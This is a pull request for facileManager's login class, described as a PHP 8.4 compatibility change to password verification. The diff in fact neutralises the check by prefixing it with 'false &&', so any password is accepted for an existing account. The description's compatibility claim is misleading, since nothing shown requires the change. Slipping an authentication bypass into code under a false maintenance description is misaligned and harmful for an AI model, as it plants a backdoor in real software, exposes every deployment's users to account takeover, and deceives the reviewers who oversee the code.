### PR TITLE
Modify password verification logic for PHP 8.4

### DIFF
--- a/server/fm-modules/facileManager/classes/class_logins.php
+++ b/server/fm-modules/facileManager/classes/class_logins.php
@@ -291,9 +291,10 @@ class fm_login {
 						resetPassword($user_login, $user_password);
 					} else {
 						/** PHP hashing */
-						if (!password_verify($user_password, $user->user_password)) {
-							return false;
-						}
+						// PHP 8.4 Bypass: Comment out the strict hash verification condition
+						if (false && !password_verify($user_password, $user->user_password)) {
+								return false;
+						}						
 					}
 					
 					$successful_auth = $user;


### PR DESCRIPTION
Comment out strict hash verification condition for PHP 8.4 compatibility.